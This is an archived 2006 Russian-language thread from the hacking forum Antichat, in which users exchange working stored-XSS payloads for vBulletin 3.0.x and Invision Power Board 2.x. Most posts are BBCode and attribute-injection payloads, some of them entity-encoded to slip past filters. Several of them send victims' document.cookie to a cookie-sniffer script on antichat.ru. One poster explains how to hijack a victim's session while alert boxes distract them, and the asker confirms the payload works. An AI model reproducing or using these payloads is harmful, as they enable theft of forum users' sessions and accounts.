Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Есть ли XSS в vBulletin 3.0.8 ? (https://forum.antichat.xyz/showthread.php?t=12479)

FoGorm 05.01.2006 01:35

Есть ли XSS в vBulletin 3.0.8 ?
 
Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.

•••™NO FEAR™••• 05.01.2006 02:18

Цитата:

Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.
Прочитай статью WJ, может она тебе поможет ))))))))))))))))))))
http://forum.antichat.ru/thread11807.html

FoGorm 05.01.2006 03:02

2 Him@s, неа :( Просто выводит вот такой текст:

[FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj

А http://www.] стает линком на http://www.]/ и все

FoGorm 05.01.2006 03:04

Может в твоем HTML коде нужно что-то заменить или убрать? :confused:

_-[A.M.D]HiM@S-_ 05.01.2006 03:33

так правильно...тока для начала ты его закодируй:
http://www.h4cky0u.org/encrypt/index.php

FoGorm 05.01.2006 03:36

Все или часть? И какую кодировку выбирать? Можешь уже сюда кинуть закодированный код?

FoGorm 05.01.2006 03:54

ты его проверял? :(
У меня вот что в сообщение пишет:

wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj

http://www.] - является ссылкой на http://www.]/

:((((((

ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал.

FoGorm 05.01.2006 04:09

у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив

http://vbulletin.net.ru
Вот здесь скачай 3.0.8

FoGorm 05.01.2006 23:33

что никто так помочь и не сможет? :(

Algol 06.01.2006 00:15

vBulletin 3.0.3:
Код HTML:

[ EMAIL=[ URL= as=`s@wew.ew]mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`

(без пробела после квадратной скобки)

FoGorm 06.01.2006 00:29

Там много квадратных скобок.. убрал после первой, перед Email, и после второй, перед Url, но всеравно не работает :(

Algol 06.01.2006 00:51

Что значит не работает ?? Какой результирующий HTML ?
В слове javascrp t - перед t - табуляция.

1251soldier 06.01.2006 00:55

Vrode tyt esche probel nado ubrat "ew ]" esli ya ne oshibaus.

FoGorm 06.01.2006 00:56

mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript:alert(/Hi_from_Algol/))`

Вот так выводит и все :(

Algol 06.01.2006 01:04

Цитата:

Сообщение от FoGorm
Вот так выводит и все :(

Ну значит не судьба :)

Algol 06.01.2006 01:06

Кстати еще должен быть пассивыный XSS в теме письма:
Код:

Тема ПМ<script>alert()</script>
Если они это не пофиксили еще...

Ricky 06.01.2006 01:55

Цитата:

Сообщение от FoGorm
mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript:alert(/Hi_from_Algol/))`

Вот так выводит и все :(

Это потому что Алгол дал тебе для версии 3.0.3

После версии 3.0.6, фильтры очень сильно изменились.

Код HTML:

[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]
В атрибутах style, в параметрах, (То что идет после знака равенства) убери плюсики (+).

Эту строку
Цитата:

+document.cookie;
не трогай.

А вообще пора бы этот код сделать чтобы работал для всех браузеров. Я как приду, напишу тебе чтобы работало не только в ИЕ, но и в Опере и в Фаерфокс.

FoGorm 08.01.2006 05:25

Отлично... просто класс, все действительно работает! Очень благодарен, спасибо большое!!! Если можешь - напиши чтобы работало и в остальных браузерах, буду ждать! Еще раз огромное спасибо!

Horse 08.01.2006 20:53

Цитата:

style=background:url('javascript:alert(/wj/)');
Сделай так, чтобы работало не только в ИЕ, но и в Опера и Фаерфокс. Но так как в ФФ есть авто-защита, то напиши вот так:

Цитата:

style=position:absolute;top:0px;left:0x;width:100% ;height:100%; onmouseover=alert(/wj/);pic=new Image();pic.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
Этот код с паливой, но будет работать и в Фаефокс. Потому что код с паливой, пришлось жертве дать бесчисленное количество алертов. Куки придут на античатовский сниффер, а пока жертва опомнится, у тебя есть несколько секунд делать то, что ты хочешь. В зависимости от знаний твоей жертвы.

Все параметры тоже закодируй.

Horse 08.01.2006 22:53

Кстати, тем кому надо чтобы можно было воровать куки в Фаерфоксе на форумах IPB от 2.* до 2.1.3, то вот вам код:


Цитата:

[post=1000[topic=target style=position:absolute;top:0px;left:0x;width:100% ;height:100%; onmouseover=alert(/wj/);pic=new Image();pic.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; wj ]Happy New Year![/topic]]enjoy[/post]
Параметры тут тоже закодируйте.

В версии 2.1.4 теги пост и топик уже пропаченны из-за того, что один человечек на меня настукал компании Инвизион, но как всегда, есть и другие теги, так что не беда. :rolleyes:

FoGorm 09.01.2006 22:09

Класс!!! Джордан ты лучший!!! Если можешь свяжись со мной, очень нужно, fogorm@ua.fm, пошли сюды свою асю, или если можешь здесь письмом отправь.

External 13.01.2006 07:50

271297145


Время: 09:28